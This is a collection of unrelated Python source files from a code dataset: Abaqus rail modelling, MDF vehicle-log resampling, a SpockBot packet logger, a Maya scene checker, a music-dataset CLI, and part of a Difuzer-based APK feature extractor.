z-normal direction\n :rtype: FaceArray (Abaqus object)\n\n \"\"\"\n faces = rail_part.faces.getByBoundingBox(xMin=-np.inf, xMax=np.inf, \n yMin=-np.inf, yMax=np.inf, \n zMax=zpos + 1.e-5, \n zMin=zpos - 1.e-5)\n return faces\n \n \ndef create_partition(rail_model, rail_part, refine_region):\n \"\"\"Create a partition by extruding the rectangle specified by \n refine_region\n \n :param rail_model: The model to which the sketch will be added\n :type rail_model: Model (Abaqus object)\n \n :param rail_part: The part in which the sets will be created\n :type rail_part: Part (Abaqus object)\n \n :param refine_region: Rectangle specifying partition with mesh \n refinement in contact region\n :type refine_region: list(list(float))\n \n :returns: None\n :rtype: None\n\n \"\"\"\n rail_cell = 
rail_part.cells[0] # Should only be 1 before partitioning\n rail_face = get_end_faces(rail_part, zpos=0.0)[0] # Should only be 1 before partitioning\n \n extrude_axis = rail_part.DatumAxisByPrincipalAxis(principalAxis=ZAXIS)\n extrude_axis = rail_part.datums[extrude_axis.id]\n vertical_axis = rail_part.DatumAxisByPrincipalAxis(principalAxis=YAXIS)\n vertical_axis = rail_part.datums[vertical_axis.id]\n \n sketch_position = rail_part.MakeSketchTransform(sketchPlane=rail_face, origin=(0.0, 0.0, 0.0), \n sketchUpEdge=vertical_axis, \n sketchPlaneSide=SIDE1)\n \n partition_sketch = rail_model.ConstrainedSketch(name='partition_sketch', sheetSize=200.0,\n transform=sketch_position)\n partition_sketch.rectangle(point1=refine_region[0], point2=refine_region[1])\n \n rail_part.PartitionFaceBySketch(faces=rail_face, sketch=partition_sketch,\n sketchUpEdge=vertical_axis, sketchOrientation=RIGHT)\n \n partition_face, point_on_partition_face = get_partition_face(rail_part, refine_region)\n partition_edge_ids = partition_face.getEdges()\n partition_edges = [rail_part.edges[i] for i in partition_edge_ids]\n \n \n # rail_part.Set(name='partition_edges', edges=part.EdgeArray(edges=partition_edges))\n rail_part.PartitionCellByExtrudeEdge(line=extrude_axis, cells=rail_cell, edges=partition_edges, \n sense=FORWARD)\n \n \ndef get_partition_face(rail_part, refine_region):\n \"\"\" Given the two points specifying the refine region rectangle,\n find the face that is within this region by checking each corner of \n the rectangle.\n \n :param rail_part: The rail part\n :type rail_part: Part object (Abaqus)\n \n :param refine_region: List of two points: [[x1,y1],[x2,y2]] \n specifying the rectangle used to partition the\n rail's end face (at z=0)\n :type refine_region: list[ list ]\n \n :returns: The face and the point used to find it\n :rtype: tuple(Face object (Abaqus), np.array)\n \n \"\"\"\n rel_length = 0.001\n def get_face(pa, pb):\n point = p1 + rel_length*(p2-p1)\n return rail_part.faces.findAt(tuple(point)), point\n \n p1, p2 = [np.array([refine_region[i][0], refine_region[i][1], 0.0]) for i in [0, 1]]\n \n face, point = get_face(p1, p2)\n if face is not None:\n return face, point\n \n face, point = get_face(p2, p1)\n if face is not None:\n return face, point\n \n p1, p2 = [np.array([refine_region[i][0], refine_region[1-i][1], 0.0]) for i in [0, 1]]\n \n face, point = get_face(p1, p2)\n if face is not None:\n return face, point\n \n face, point = get_face(p2, p1)\n if face is not None:\n return face, point\n \n raise ValueError('Could not find the partition face')\n\n\ndef add_material_and_section(rail_model, rail_part, material):\n \"\"\" Create the material specified and create one section for the \n entire rail.\n \n :param rail_model: The rail model\n :type rail_model: Model object (Abaqus)\n \n :param rail_part: The rail part\n :type rail_part: Part object (Abaqus)\n \n :param material: The material specification dictionary, see \n material_spec in \n :py:func:`~rollover.utils.setup_material_mod.add_material`\n :type material: dict\n \n \"\"\"\n setup_material.add_material(rail_model, material_spec=material, name='RAIL_MATERIAL')\n rail_model.HomogeneousSolidSection(name=names.rail_sect, material='RAIL_MATERIAL')\n region = regionToolset.Region(cells=rail_part.cells)\n rail_part.SectionAssignment(region=region, 
sectionName=names.rail_sect)\n\n","repo_name":"KnutAM/AbaqusRolloverSimulation","sub_path":"rollover/three_d/rail/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":13406,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"}
{"seq_id":"12922032271","text":"# -*- coding:utf-8 -*-\r\nimport os,scipy, shutil\r\nimport numpy as np\r\n\r\n\r\nimport mdfreader\r\n\r\n\r\n# Load the data into memory\r\nDataFile = mdfreader.mdf()\r\nDataFile.read(fileName=File_Path, channelList=signal_list)\r\n# Loading the signals may fail to load the time channels, which makes resample impossible, so read once more to add the time channels\r\ntimeline_list = []\r\nfor i in range(len(signal_list)):\r\n    timeline_list.append(DataFile.getChannelMaster(signal_list[i]))\r\nDataFile.read(fileName=file_path, channelList=timeline_list)\r\n'''\r\n# Works around garbled values occasionally seen when reading signal values in the past; reading no longer has this problem\r\nfor n in range(len(special_signal_list)):\r\n    key_list=[]\r\n    value_list_of_key=[]\r\n    for key,value in DataFile.masterChannelList.items():\r\n        key_list.append(key)\r\n        value_list_of_key.append(value)\r\n    for i in range(len(value_list_of_key)):\r\n        if special_signal_list[n] in value_list_of_key[i]:\r\n            #get_value_index = value_list_of_key[i].index(Special_Signal_List[n])\r\n            vars()[special_signal_list[n] + '_value'] = np.where(DataFile.getChannelData(special_signal_list[n]) == 'FALSE', 0, 1)\r\n            #print(vars()[Special_Signal_List[n] + '_value'])\r\n            DataFile.remove_channel(special_signal_list[n])\r\n            #print(DataFile.masterChannelList)\r\n            DataFile.add_channel(dataGroup=key_list[i], channel_name=special_signal_list[n], data=vars()[special_signal_list[n] + '_value'], master_channel=key_list[i], )\r\n            #print(DataFile.masterChannelList)\r\nprint(DataFile.getChannelData(kl15_name).max())\r\n'''\r\n# resample; if no number or signal is given, the channel with the highest sampling rate is used as the reference\r\nDataFile.resample(0.01)\r\n# Get the signal values, in numpy format\r\nengine_speed_name = 'nmot_w'\r\nengine_speed_value = DataFile.getChannelData(engine_speed_name)\r\n# Get the name of the group the signal belongs to\r\nengine_speed_group = DataFile.getChannelMaster(engine_speed_name)\r\n# Remove, add and modify signals\r\nDataFile.remove_channel(engine_speed_name)\r\nDataFile.add_channel(dataGroup=engine_speed_group, channel_name=engine_speed_name, data=engine_speed_value, master_channel=engine_speed_group)\r\nDataFile.setChannelData(engine_speed_name, engine_speed_value, compression=False)\r\n\r\n\r\n\r\n# Repair the mileage signal (the value sometimes drops to 0)\r\nif mileage_name in DataFile.keys():\r\n    mileage_channel_master = DataFile.getChannelMaster(mileage_name)\r\n    mileage_value_temp = DataFile.getChannelData(mileage_name)\r\n    for i in range(len(mileage_value_temp) - 1, -2, -1):\r\n        if mileage_value_temp[i] == 0:\r\n            mileage_value_temp[i] = mileage_value_temp[i + 1]\r\n    DataFile.remove_channel(mileage_name)\r\n    DataFile.add_channel(dataGroup=mileage_channel_master, channel_name=mileage_name, data=mileage_value_temp, master_channel=mileage_channel_master)\r\n\r\nprint(DataFile.masterChannelList)  # signal list before resampling\r\n#print(DataFile.MDFVersionNumber)  # MDF version\r\n# Resample the signals; by default the signal with the highest sampling rate is the reference\r\nprint('file loaded, start resampling')\r\n#DataFile.resample(masterChannel=DataFile.getChannelMaster(engine_speed_name))\r\nDataFile.resample(0.01)\r\n#DataFile.resample()\r\nprint(DataFile.masterChannelList)  # signal list after resampling\r\n# time channel after resampling\r\n#t_new = 'master'\r\n\r\n# Assign the resampled data to variables (and concatenate)\r\nt_new = DataFile.getChannelMaster(engine_speed_name)\r\ntime_value_temp = DataFile.getChannelData(t_new)\r\n#print(time_value_temp)\r\nif i_file > 0:\r\n    time_value_temp += time_value.max()\r\ntime_value = np.append(time_value, time_value_temp )\r\nfor i in range(len(signal_list)):\r\n    if signal_list[i] in DataFile.keys():\r\n        vars()[signal_name_list[i] + '_value'] = np.append(vars()[signal_name_list[i] + '_value'], DataFile.getChannelData(signal_list[i]))\r\n    else:\r\n        print(signal_list[i] + ' not found')\r\n        #nofound_signal_list.append(signal_list[i])\r\n        #vars()[signal_name_list[i] + '_value'] = np.append(vars()[signal_name_list[i] + '_value'], np.zeros(len(time_value), dtype=np.int))\r\n\r\n\r\n# ----------------------------------------------------------------------------------\r\n# Store every possible signal name for each physical quantity in Excel, then the program decides in turn which signal name to use when reading the data\r\n# ----------------------------------------------------------------------------------\r\n# -------------------------------------------------------\r\n# Set the list of signals to load\r\n# -------------------------------------------------------\r\nself.wbk_signal = openpyxl.load_workbook('Signal List.xlsx')\r\nself.sht_signal = self.wbk_signal.worksheets[0]\r\n# Sheet 1, used for the large plot\r\nself.signal_name_list_1 = [\r\n    'speed',\r\n    'engine speed',\r\n    'pedal',\r\n    'water temp',\r\n    'Lamb Precat',\r\n    'Lamb Postcat'\r\n]\r\nself.speed_list = self.get_signal_list(2)\r\nself.engine_speed_list = self.get_signal_list(3)\r\nself.pedal_list = self.get_signal_list(4)\r\nself.water_temp_list = self.get_signal_list(5)\r\nself.lamb_precat_list = self.get_signal_list(6)\r\nself.lamb_postcat_list = self.get_signal_list(7)\r\n\r\n\r\ndef get_signal_list(self, x):\r\n    y = 2\r\n    signal = []\r\n    while self.sht_signal.cell(row=x, column=y).value != None:\r\n        signal.append(self.sht_signal.cell(row=x, column=y).value)\r\n        y += 1\r\n    return signal\r\n\r\n\r\ndef get_signal_name(self, list, names):\r\n    for name in names:\r\n        if name in list:\r\n            return name\r\n    \r\nself.data_file = mdfreader.mdf()\r\n# First read all signals in the file\r\nself.data_file.read(fileName=self.file_path)\r\nchannel_list = self.data_file.keys()\r\n# Determine the signal name of each physical quantity from the signals in the file and the signal lists read earlier\r\n# 1\r\nself.speed_name = self.get_signal_name(channel_list, self.speed_list)\r\nself.engine_speed_name = self.get_signal_name(channel_list, self.engine_speed_list)\r\nself.pedal_name = self.get_signal_name(channel_list, self.pedal_list)\r\nself.water_temp_name = self.get_signal_name(channel_list, self.water_temp_list)\r\nself.lamb_precat_name = self.get_signal_name(channel_list, self.lamb_precat_list)\r\nself.lamb_postcat_name = self.get_signal_name(channel_list, self.lamb_postcat_list)\r\nself.signal_list_1 = [\r\n    self.speed_name,\r\n    self.engine_speed_name,\r\n    self.pedal_name,\r\n    self.water_temp_name,\r\n    self.lamb_precat_name,\r\n    self.lamb_postcat_name,\r\n]\r\nself.data_file = mdfreader.mdf()\r\nself.data_file.read(fileName=self.file_path, channelList=self.signal_list)\r\n# A plugin bug may prevent the time channel from being loaded when loading signals, making resample impossible, so read once more to add the time channels\r\ntimeline_list = []  # list of signals needed\r\nfor i in range(len(self.signal_list)):\r\n    timeline_list.append(self.data_file.getChannelMaster(self.signal_list[\r\n        i]))  # Extract channel master name from mdf structure; return name string, e.g. the engine speed signal and its time base form a channel master\r\nself.data_file.read(fileName=self.file_path,\r\n                    channelList=timeline_list)  # masterChannelList, a dict containing a list of channel names per datagroup; reload once to add the time channel, since loading by signal name alone may miss it\r\nprint('file loaded, start resampling')","repo_name":"TJ072175/My-Python-Code","sub_path":"读取MDF文件.py","file_name":"读取MDF文件.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"28950044799","text":"\"\"\"\nA plugin that just echoes every packet other than 
the chunk data\nand player position\n\"\"\"\n__author__ = \"Nick Gamberini, Morgan Creekmore\"\n__copyright__ = \"Copyright 2015, The SpockBot Project\"\n__license__ = \"MIT\"\n\nimport logging\n\nfrom spockbot.mcp.mcdata import hashed_structs\n\nlogger = logging.getLogger('spockbot')\n\nBLACKLIST = ['PLAYPlayer Position']\n\n\nclass EchoPacketPlugin:\n def __init__(self, ploader, settings):\n for i in list(hashed_structs.keys()):\n ploader.reg_event_handler(i, self.echopacket)\n\n def echopacket(self, name, packet):\n # Don't print Chunk Data and Map Chunk Bulk\n if packet.str_ident not in BLACKLIST:\n logger.info(str(packet))\n","repo_name":"SpockBotMC/SpockBot-Extra","sub_path":"plugins/echo_packet.py","file_name":"echo_packet.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"}{"seq_id":"5140916753","text":"import os\nimport sys\nimport re\nimport glob\nimport maya.OpenMaya as api\nimport maya.cmds as cmds\nimport maya.mel as mel\nimport shutil\nimport subprocess\nfrom pprint import pprint\n\nclass mayaCmds(object):\n\n def __init__(self, parent = None):\n pass\n\n def checkNodeType(self, node):\n return cmds.nodeType(node)\n\n def selectNode(self, node):\n cmds.select(node, r=True)\n\n def getArnoldShaders(self):\n aiShaders = cmds.listNodeTypes('rendernode/arnold', ex='texture:light:shader/utility:shader/volume')\n if aiShaders is None:\n return []\n else:\n return aiShaders\n return\n\n def getAiConnectedShaders(self, shape):\n aiCShaders = []\n othCShaders = []\n multiSG = []\n aiShaders = self.getArnoldShaders()\n sgShaders = cmds.listConnections(shape, type='shadingEngine')\n if len(sgShaders) > 1:\n multiSG.append(shape)\n for sgShader in sgShaders:\n nodes = cmds.listConnections('%s.surfaceShader' % sgShader, source=True)\n if nodes:\n for node in nodes:\n if cmds.nodeType(node) in aiShaders:\n aiCShaders.append(node)\n else:\n othCShaders.append(node)\n\n return (multiSG, othCShaders, aiCShaders)\n\n def getFileNodesTexturesAssigend(self, shape):\n fileNodes = []\n texFiles = []\n udimTex = []\n ofileNodes = []\n oudimTex = []\n otexFiles = []\n otherNodes = []\n skipTex = []\n aiShaders = self.getArnoldShaders()\n sgShaders = cmds.listConnections(shape, type='shadingEngine')\n if sgShaders:\n for sgShader in sgShaders:\n nodes = cmds.listConnections('%s.surfaceShader' % sgShader, source=True)\n if nodes:\n for node in nodes:\n if cmds.nodeType(node) in aiShaders:\n try:\n cmds.setAttr('%s.shd' % shape, l=False)\n cmds.setAttr('%s.shd' % shape, '%s' % sgShader, type='string')\n cmds.setAttr('%s.shd' % shape, l=True)\n except:\n pass\n\n fileTexNodes = cmds.listConnections(node, type='file')\n bumpNodes = cmds.listConnections(node, type='bump2d')\n dispNodes = cmds.listConnections(node, type='displacementShader')\n if bumpNodes:\n otherNodes += bumpNodes\n if dispNodes:\n otherNodes += dispNodes\n if fileTexNodes:\n for fnode in fileTexNodes:\n texture = cmds.getAttr('%s.fileTextureName' % fnode)\n texture.replace('\\\\', '/')\n texture = cmds.workspace(expandName=texture)\n udimTokens = re.split(r'\\.', texture) # split on a literal dot (re.split('.', ...) would split on every character)\n if len(udimTokens) > 1:\n alltex = glob.glob('%s*%s' % (udimTokens[0], udimTokens[1]))\n for tex in alltex:\n tokens = self.getTonkenizedPath(tex)\n udimTex.append(tex)\n\n tokens = self.getTonkenizedPath(texture)\n texFiles.append(texture)\n fileNodes.append(fnode)\n\n if otherNodes:\n for onode in otherNodes:\n ofileTexNodes = cmds.listConnections(onode, type='file')\n if 
ofileTexNodes:\n for ofnode in ofileTexNodes:\n texture = cmds.getAttr('%s.fileTextureName' % ofnode)\n texture.replace('\\\\', '/')\n texture = cmds.workspace(expandName=texture)\n udimTokens = re.split(r'\\.', texture)\n if len(udimTokens) > 1:\n alltex = glob.glob('%s*%s' % (udimTokens[0], udimTokens[1]))\n oudimTex.extend(alltex)\n otexFiles.append(texture)\n ofileNodes.append(ofnode)\n\n return {'nodes': fileNodes,\n 'textures': texFiles,\n 'udim': udimTex,\n 'onodes': ofileNodes,\n 'otextures': otexFiles,\n 'oudim': oudimTex}\n\n def getShapesTextureFiles(self, prefix = ''):\n cmds.select(cl=True)\n try:\n cmds.select('%s_*' % prefix)\n except:\n cmds.select(all=True)\n\n shapes = cmds.ls(type='surfaceShape', sl=True, dag=True)\n if shapes is None:\n shapes = cmds.ls(type='surfaceShape')\n texDict = {}\n for shape in shapes:\n texDict[shape] = self.getFileNodesTexturesAssigend(shape)\n\n return texDict\n\n def checkTextureFiles(self):\n missingTex = {}\n files = cmds.ls(tex=True)\n for nodefile in files:\n try:\n texture = cmds.getAttr('%s.fileTextureName' % nodefile)\n texture = cmds.workspace(expandName=texture)\n texture.replace('\\\\', '/')\n udimTokens = re.split(r'\\.', texture)\n if len(udimTokens) > 1:\n alltex = glob.glob('%s*%s' % (udimTokens[0], udimTokens[1]))\n if len(alltex) == 0:\n missingTex[nodefile] = texture\n elif os.path.exists(texture) and os.path.isfile(texture):\n pass\n else:\n missingTex[nodefile] = texture\n except:\n pass\n\n return missingTex\n\n def delExtraCamLight(self):\n delList = []\n defCams = ('frontShape', 'perspShape', 'sideShape', 'topShape')\n camLigths = cmds.ls(type=['camera', 'light'])\n for cl in camLigths:\n if cmds.nodeType(cl) == 'camera' and cl not in defCams:\n cmds.delete(cl)\n delList.append(cl)\n elif cl not in defCams:\n cmds.delete(cl)\n delList.append(cl)\n\n return delList\n\n def checkUVs(self, shape):\n nodeDagPath = api.MDagPath()\n component = api.MObject()\n selList = api.MSelectionList()\n selList.add(shape)\n selList.getDagPath(0, nodeDagPath, component)\n mfnMesh = api.MFnMesh(nodeDagPath)\n itPoly = api.MItMeshPolygon(nodeDagPath, component)\n uvprob = False\n uvnegative = False\n noUVs = []\n negUVs = []\n itPoly.reset(nodeDagPath, component)\n while not itPoly.isDone():\n index = itPoly.index()\n uArray = api.MFloatArray()\n vArray = api.MFloatArray()\n if not itPoly.hasUVs():\n noUVs.append(index)\n uvprob = True\n else:\n itPoly.getUVs(uArray, vArray)\n for i in range(uArray.length()):\n if uArray[i] < -0.001 or vArray[i] < -0.001:\n negUVs.append(index)\n uvnegative = True\n break\n\n itPoly.next()\n\n return (noUVs, negUVs)\n\n def checkRemoveRefs(self):\n curScene = cmds.file(q=True, sceneName=True)\n refs = cmds.file(curScene, q=True, reference=True)\n for ref in refs:\n cmds.file(ref, removeReference=True)\n\n return refs\n\n def deleteLayers(self):\n layers = cmds.ls(type=['displayLayer', 'renderLayer'])\n for layer in layers:\n if layer not in ('defaultRenderLayer', 'defaultLayer'):\n cmds.delete(layer)\n\n def deleteNonStaticChannel(self, node):\n attrs = cmds.listAttr(node, k=True)\n if attrs:\n for attr in attrs:\n try:\n cmds.deleteAttr(node, attribute=attr)\n except:\n pass\n\n def optimizeDefValues(self):\n optionVars = ('nurbsSrfOption', 'nurbsCrvOption', 'unusedNurbsSrfOption', 'locatorOption', 'clipOption', 'poseOption', 'ptConOption', 'pbOption', 'deformerOption', 'unusedSkinInfsOption', 'expressionOption', 'groupIDnOption', 'animationCurveOption', 'snapshotOption', 'unitConversionOption', 
'shaderOption', 'cachedOption', 'transformOption', 'displayLayerOption', 'renderLayerOption', 'setsOption', 'partitionOption', 'referencedOption', 'brushOption', 'unknownNodesOption', 'shadingNetworksOption')\n cmds.optionVar(iv=('nurbsSrfOption', 1))\n cmds.optionVar(iv=('nurbsCrvOption', 0))\n cmds.optionVar(iv=('unusedNurbsSrfOption', 0))\n cmds.optionVar(iv=('locatorOption', 0))\n cmds.optionVar(iv=('clipOption', 0))\n cmds.optionVar(iv=('poseOption', 0))\n cmds.optionVar(iv=('ptConOption', 0))\n cmds.optionVar(iv=('pbOption', 1))\n cmds.optionVar(iv=('deformerOption', 0))\n cmds.optionVar(iv=('unusedSkinInfsOption', 1))\n cmds.optionVar(iv=('expressionOption', 0))\n cmds.optionVar(iv=('groupIDnOption', 1))\n cmds.optionVar(iv=('animationCurveOption', 1))\n cmds.optionVar(iv=('snapshotOption', 1))\n cmds.optionVar(iv=('unitConversionOption', 1))\n cmds.optionVar(iv=('shaderOption', 1))\n cmds.optionVar(iv=('cachedOption', 0))\n cmds.optionVar(iv=('transformOption', 1))\n cmds.optionVar(iv=('displayLayerOption', 1))\n cmds.optionVar(iv=('renderLayerOption', 1))\n cmds.optionVar(iv=('setsOption', 1))\n cmds.optionVar(iv=('partitionOption', 0))\n cmds.optionVar(iv=('referencedOption', 1))\n cmds.optionVar(iv=('brushOption', 1))\n cmds.optionVar(iv=('unknownNodesOption', 1))\n cmds.optionVar(iv=('shadingNetworksOption', 0))\n\n def setOptVariables(self, variables = []):\n for var in variables:\n cmds.optionVar(iv=(var['name'], var['value']))\n\n def sceneCheck(self, ref = False, cam = False, history = False, freezeTransf = False, nonStChannel = False, normal = False, UVs = False, aiShader = False, texture = False, polyCleanUp = False, shell = False, cleanUp = False):\n if os.name == 'nt':\n cmds.unloadPlugin('vrayformaya.mll', force=True)\n cmds.unloadPlugin('3delight_for_mayaX.mll', force=True)\n cmds.unloadPlugin('RenderMan_for_Maya.mll', force=True)\n else:\n cmds.unloadPlugin('vrayformaya.so', force=True)\n cmds.unloadPlugin('3delight_for_mayaX.so', force=True)\n cmds.unloadPlugin('RenderMan_for_Maya.so', force=True)\n objectsDict = {}\n missTex = []\n if ref:\n remRefs = self.checkRemoveRefs()\n if cam:\n delCamLights = self.delExtraCamLight()\n if texture:\n missTex = self.checkTextureFiles()\n cmds.select(cl=True)\n cmds.select(all=True)\n objs = cmds.ls(selection=True)\n for obj in objs:\n parent = cmds.listRelatives(obj, parent=True, type='transform')\n if freezeTransf:\n cmds.makeIdentity(obj, apply=True, t=1, r=1, s=1, n=0)\n if nonStChannel:\n self.deleteNonStaticChannel(obj)\n namesp = cmds.namespaceInfo(currentNamespace=True)\n if namesp != ':':\n cmds.namespace(namesp, rm=True)\n transforms = cmds.listRelatives(obj, allDescendents=True, type=['transform', 'surfaceShape'])\n if transforms is not None:\n for transf in transforms:\n multiSG = []\n cOthers = []\n cAiShaders = []\n noUVs = []\n negUVs = []\n numShells = []\n try:\n if history:\n cmds.delete(transf, ch=True)\n nodeDagPath = api.MDagPath()\n component = api.MObject()\n selList = api.MSelectionList()\n selList.add(transf)\n selList.getDagPath(0, nodeDagPath, component)\n nodeDagPath.extendToShape()\n shapeName = nodeDagPath.partialPathName()\n if aiShader:\n multiSG, cOthers, cAiShaders = self.getAiConnectedShaders(shapeName)\n if normal:\n cmds.polyNormal(shapeName, nm=2)\n cmds.delete(shapeName, ch=True)\n cmds.select(shapeName, r=True)\n if polyCleanUp:\n mel.eval('polyCleanupArgList 3 {\"0\",\"1\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"1\",\"1e-005\",\"1\",\"1e-005\",\"0\",\"1e-005\",\"0\",\"1\",\"1\"};')\n if 
UVs:\n noUVs, negUVs = self.checkUVs(shapeName)\n if shell:\n nshell = cmds.polyEvaluate(shapeName, shell=True)\n if nshell > 1:\n numShells.append(nshell)\n if nonStChannel:\n self.deleteNonStaticChannel(transf)\n objectsDict[shapeName] = {'name': shapeName,\n 'aiShaderAssigned': cAiShaders,\n 'shaderAssigned': cOthers,\n 'perFaceAssigned': multiSG,\n 'faceNoUvs': noUVs,\n 'faceNegUvs': negUVs,\n 'nShells': numShells}\n except Exception as msg:\n pass\n\n if cleanUp:\n self.optimizeDefValues()\n mel.eval('source \"cleanUpScene\";')\n mel.eval('cleanUp_ShouldReportProgress;')\n mel.eval('performCleanUpScene;')\n return [missTex, objectsDict]\n\n def runCheckPreset(self, preset):\n result = []\n if preset == 'Modelling sCheck':\n result = self.sceneCheck(ref=True, cam=True, history=True, freezeTransf=True, nonStChannel=True, normal=True, UVs=True, polyCleanUp=True, shell=True, cleanUp=True)\n elif preset == 'Textures sCheck':\n result = self.sceneCheck(ref=True, cam=True, history=True, nonStChannel=True, normal=True, UVs=True, aiShader=True, texture=True, cleanUp=True)\n elif preset == 'Cloth&Hair sCheck':\n result = self.sceneCheck(ref=True, cam=True, normal=True, UVs=True, aiShader=True)\n elif preset == 'Rigging sCheck':\n result = self.sceneCheck(ref=True, cam=True, aiShader=True)\n return result","repo_name":"iceanimations/fallback","sub_path":"Maya/sceneCheck_v1.0.0/modules/sCheckModules.py","file_name":"sCheckModules.py","file_ext":"py","file_size_in_byte":15088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}{"seq_id":"20273506373","text":"import sys\nimport decorate_artist_list\nimport produce_test_dataset\n\n\n#Modes accepted \nMODE_SEARCH_IG_PROFILE_BY_ARTIST_NAME_MUSIC_STORY = \"MODE_SEARCH_IG_PROFILE_BY_ARTIST_NAME_MUSIC_STORY\"\nMODE_SEARCH_IG_FOLLLOWERS_BY_IG_USERNAME = \"MODE_SEARCH_IG_FOLLLOWERS_BY_IG_USERNAME\"\nMODE_SEARCH_IG_FOLLLOWERS_BY_ARTIST_NAME = \"MODE_SEARCH_IG_FOLLLOWERS_BY_ARTIST_NAME\"\nMODE_PRODUCE_TEST_DATASET_BY_PLAYLIST = \"MODE_PRODUCE_TEST_DATASET_BY_PLAYLIST\"\n\ndef main():\n message = \"\"\n arguments = sys.argv[1:]\n print(arguments)\n if len(arguments) < 2:\n message = \"mode and input file needed\"\n print(message)\n return message\n\n mode = arguments[0]\n input_filename = arguments[1]\n\n if mode == MODE_SEARCH_IG_PROFILE_BY_ARTIST_NAME_MUSIC_STORY:\n print(f\"called function : {mode} with param file {input_filename}\")\n #input_filename = \"spotify_artists.csv\"\n return decorate_artist_list.decorate_music_story_artist(input_filename)\n elif mode == MODE_SEARCH_IG_FOLLLOWERS_BY_IG_USERNAME:\n print(f\"called function : {mode} with param file {input_filename}\")\n #input_filename = \"music_story_enriched_artist.csv\"\n return decorate_artist_list.decorate_instagram_followers_artist_based_on_username(input_filename)\n elif mode == MODE_SEARCH_IG_FOLLLOWERS_BY_ARTIST_NAME:\n print(f\"called function : {mode} with param file {input_filename}\")\n #input_filename = \"UNION MSI01-IS01-IS02 - Not Found - Duplicates Removed.csv\"\n return decorate_artist_list.decorate_instagram_followers_artist_based_on_name_search(input_filename)\n elif mode == MODE_PRODUCE_TEST_DATASET_BY_PLAYLIST:\n print(f\"called function : {mode} with param file {input_filename}\")\n #spotify_playlist_id = \"2be8Q4uvGVnH3didCoySP6\"\n spotify_playlist_id = input_filename\n return produce_test_dataset.produce_test_dataset_by_spotify_playlist(spotify_playlist_id)\n else:\n message = f\"invalid mode: {mode}\"\n print(message)\n return 
message\n\nif __name__ == \"__main__\":\n sys.exit(main())","repo_name":"joseph-higaki/music-hit-decorate-datasets","sub_path":".vscode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}{"seq_id":"26226643188","text":"# IMPORT\nfrom nltk import pos_tag\nfrom nltk.corpus import stopwords\nfrom nltk.corpus import wordnet\nfrom nltk.stem import SnowballStemmer\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nimport nltk, re\nimport subprocess\nimport requests\nimport numpy as np\nimport os\nimport re\nimport string\nimport enchant\n\n# Difuzer++\n# \n# Copyright (C) 2023 Marco Alecci\n# University of Luxembourg - Interdisciplinary Centre for\n# Security Reliability and Trust (SnT) - TruX - All rights reserved\n# \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 2.1 of the\n# License, or (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Lesser Public License for more details.\n# \n# You should have received a copy of the GNU General Lesser Public\n# License along with this program. If not, see .\n\n################## API KEYS ########################\nfrom dotenv import load_dotenv\nimport os,sys\n# Load API KEYS from the .env file in the current directory\nCONFIG_PATH = \"./config.env\"\nif not os.path.exists(CONFIG_PATH):\n print(f\"⚠️ Error: File not found at path '{CONFIG_PATH}'.\\n- Make sure the config.env file exists.\\n- Ensure the CONFIG_PATH is correctly set.\")\n sys.exit(1)\nelse:\n load_dotenv(CONFIG_PATH)\nANDROZOO_API_KEY = os.getenv('ANDROZOO_API_KEY')\nOPENAI_API_KEY = os.getenv('OPENAI_API_KEY')\nANDROID_PLATFORM_PATH = os.environ.get('ANDROID_PLATFORM_PATH')\nAPK_PATH = os.environ.get('APK_PATH')\n#######################################################\n\n# extractFeatures()\n# 1) Download APK from AndroZoo\n# 2) Launch Difuzer with all details about possible logic bombs (filtering applied)\n# 3) Combine the features using predefined delimitators and return them\ndef extractFeatures(sha256):\n\n # Download apk from Androzoo\n apkUrl = \"https://androzoo.uni.lu/api/download?apikey={}&sha256={}\".format(ANDROZOO_API_KEY, sha256)\n req = requests.get(apkUrl, allow_redirects=True)\n open(APK_PATH+'{}.apk'.format(sha256), \"wb\").write(req.content)\n\n # Get the features using Difuzer\n command = 'java -jar ./Difuzer-0.1-jar-with-dependencies.jar -a {}{}.apk -p {}'.format(APK_PATH, sha256, ANDROID_PLATFORM_PATH)\n print(\"EXECUTING: {}\\n\".format(command))\n \n # Output from Difuzer\n process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)\n output, error = process.communicate()\n\n # Remove apk file\n os.remove(APK_PATH + '{}.apk'.format(sha256))\n\n # Reorganize features using predefined delimitators\n triggersFeaturesList = output.decode(\"utf-8\").split(\"@@@\\n\")[:-1]\n\n # If empty list\n if len(triggersFeaturesList) == 0:\n return np.nan\n \n for i in range(0,len(triggersFeaturesList)):\n triggersFeaturesList[i] = triggersFeaturesList[i].replace(\"\\n\",\";\")\n\n if triggersFeaturesList[0] != \"\":\n for i in range(0, len(triggersFeaturesList)):\n 
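# (Added note, hedged) Assumed shape of a raw Difuzer record, inferred from the splits below\n # rather than verified against Difuzer's output: \"fv;method;condition;src1$$$src2$$$\",\n # so entry i becomes [fv, method, condition, [src1, src2, ...]] after both splits.\n 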
